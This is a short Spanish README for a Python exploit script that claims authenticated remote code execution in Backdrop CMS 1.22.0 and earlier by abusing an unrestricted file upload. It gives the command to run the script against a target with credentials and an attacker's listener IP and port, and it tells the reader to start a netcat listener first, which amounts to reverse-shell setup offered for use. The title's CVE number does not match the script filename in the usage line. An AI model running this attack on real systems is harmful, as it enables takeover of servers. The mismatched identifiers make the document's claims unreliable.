
CVE-2023-46818 Exploit en Python3 para Backdrop CMS <= 1.22.0 Ejecución Remota de Comandos Autenticada (RCE)
Este script de exploit en Python ataca una subida de archivos sin restricciones en Backdrop CMS para lograr una Ejecución Remota de Código (RCE).
Versión 1.22.0 y versiones anteriores Nota: Backdrop CMS disputa esto y argumenta que se requieren permisos avanzados, por lo que podría seguir existiendo en versiones posteriores a la 1.22.0. Supongo que quieren decir que primero necesitarías tener acceso de administrador. Aun así, es una vulnerabilidad válida y definitivamente puede ser explotada para obtener el control total del sistema.
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
Importante: Inicia tu listener antes de ejecutar el script:
nc -lvnp <listener_port>
